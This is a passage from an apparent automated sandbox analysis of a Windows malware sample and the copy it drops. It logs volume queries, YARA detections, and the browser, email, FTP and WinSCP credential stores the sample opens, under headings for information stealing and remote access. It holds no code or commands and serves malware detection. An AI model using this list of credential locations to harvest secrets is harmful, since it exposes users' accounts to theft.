                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
